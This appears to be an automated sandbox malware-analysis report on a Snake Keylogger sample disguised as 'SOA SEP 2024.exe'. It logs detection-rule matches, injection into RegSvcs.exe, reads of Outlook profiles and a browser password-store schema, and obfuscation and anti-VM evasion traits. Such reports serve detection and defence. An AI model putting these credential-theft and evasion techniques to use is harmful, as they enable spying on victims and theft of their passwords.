Source: Process Memory Space: RegSvcs.exe PID: 1560, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: 2.2.RegSvcs.exe.5650000.6.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.RegSvcs.exe.5650000.6.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.RegSvcs.exe.5650000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.RegSvcs.exe.5650000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.RegSvcs.exe.5650000.6.raw.unpack, 2-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.RegSvcs.exe.5650000.6.raw.unpack, 2-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.RegSvcs.exe.5750ee8.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.RegSvcs.exe.5750ee8.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.RegSvcs.exe.4176458.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.RegSvcs.exe.4176458.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.RegSvcs.exe.41a9590.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.RegSvcs.exe.41a9590.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 2.2.RegSvcs.exe.5650000.6.raw.unpack, ---.cs	Base64 encoded string: 'tPa5k5FJD4dSXw0EqQ2lIcLtrXnSHhm60gt1D+3WpsNqPxTv3g1y5+EIwUawZGy8'
Source: 2.2.RegSvcs.exe.5750ee8.8.raw.unpack, ---.cs	Base64 encoded string: 'tPa5k5FJD4dSXw0EqQ2lIcLtrXnSHhm60gt1D+3WpsNqPxTv3g1y5+EIwUawZGy8'
Source: 2.2.RegSvcs.exe.4176458.4.raw.unpack, ---.cs	Base64 encoded string: 'tPa5k5FJD4dSXw0EqQ2lIcLtrXnSHhm60gt1D+3WpsNqPxTv3g1y5+EIwUawZGy8'
Source: 2.2.RegSvcs.exe.41a9590.3.raw.unpack, ---.cs	Base64 encoded string: 'tPa5k5FJD4dSXw0EqQ2lIcLtrXnSHhm60gt1D+3WpsNqPxTv3g1y5+EIwUawZGy8'
Source: 2.2.RegSvcs.exe.2ee5dce.1.raw.unpack, ---.cs	Base64 encoded string: 'tPa5k5FJD4dSXw0EqQ2lIcLtrXnSHhm60gt1D+3WpsNqPxTv3g1y5+EIwUawZGy8'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/2@2/2

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_007ACE7A GetLastError,FormatMessageW,

0_2_007ACE7A

Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_0079AB84 AdjustTokenPrivileges,CloseHandle,		0_2_0079AB84
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_0079B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_0079B134

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_007AE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_007AE1FD

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_007A6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,

0_2_007A6532

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_007BC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,

0_2_007BC18C

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_0076406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_0076406B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

File created: C:\Users\user\AppData\Local\Temp\aut6260.tmp

Jump to behavior

Source: SOA SEP 2024.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegSvcs.exe, 00000002.00000002.4553786112.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4553786112.0000000003410000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4555060395.0000000004266000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4553786112.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4553786112.000000000341D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4553786112.00000000033E9000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: SOA SEP 2024.exe	ReversingLabs: Detection: 31%
Source: SOA SEP 2024.exe	Virustotal: Detection: 27%

Source: unknown	Process created: C:\Users\user\Desktop\SOA SEP 2024.exe "C:\Users\user\Desktop\SOA SEP 2024.exe"
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\SOA SEP 2024.exe"
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\SOA SEP 2024.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: SOA SEP 2024.exe

Static file information: File size 1146368 > 1048576

Source: SOA SEP 2024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SOA SEP 2024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SOA SEP 2024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SOA SEP 2024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SOA SEP 2024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SOA SEP 2024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: SOA SEP 2024.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: _.pdb source: RegSvcs.exe, 00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4555060395.0000000004171000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4553461018.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: SOA SEP 2024.exe, 00000000.00000003.2096647600.0000000003690000.00000004.00001000.00020000.00000000.sdmp, SOA SEP 2024.exe, 00000000.00000003.2096906807.00000000034F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: SOA SEP 2024.exe, 00000000.00000003.2096647600.0000000003690000.00000004.00001000.00020000.00000000.sdmp, SOA SEP 2024.exe, 00000000.00000003.2096906807.00000000034F0000.00000004.00001000.00020000.00000000.sdmp

Source: SOA SEP 2024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SOA SEP 2024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SOA SEP 2024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SOA SEP 2024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SOA SEP 2024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 2.2.RegSvcs.exe.5650000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 2.2.RegSvcs.exe.5750ee8.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 2.2.RegSvcs.exe.4176458.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 2.2.RegSvcs.exe.41a9590.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 2.2.RegSvcs.exe.2ee5dce.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_0077E01E LoadLibraryA,GetProcAddress,

0_2_0077E01E

Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_0077288B push 66007723h; retn 007Dh	0_2_007728E1
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_00786B05 push ecx; ret	0_2_00786B18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0041C40C push cs; iretd	2_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00423149 push eax; ret	2_2_00423179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0041C50E push cs; iretd	2_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_004231C8 push eax; ret	2_2_00423179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0040E21D push ecx; ret	2_2_0040E230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0041C6BE push ebx; ret	2_2_0041C6BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0041BFCD pushad ; ret	2_2_0041BFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02DC4771 pushfd ; iretd	2_2_02DC4772
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02DC2720 push FFFFFF9Eh; iretd	2_2_02DC2724
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BCE48F push es; retf	2_2_06BCE490

Source: 2.2.RegSvcs.exe.5650000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'lXmeqrAKqylJZ', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 2.2.RegSvcs.exe.5750ee8.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'lXmeqrAKqylJZ', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 2.2.RegSvcs.exe.4176458.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'lXmeqrAKqylJZ', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 2.2.RegSvcs.exe.41a9590.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'lXmeqrAKqylJZ', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 2.2.RegSvcs.exe.2ee5dce.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'lXmeqrAKqylJZ', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007C8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_007C8111
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_0077EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_0077EB42

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_0078123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0078123A

Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: RegSvcs.exe PID: 1560, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

API/Special instruction interceptor: Address: D691E4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

2_2_004019F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599782	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596735	Jump to behavior
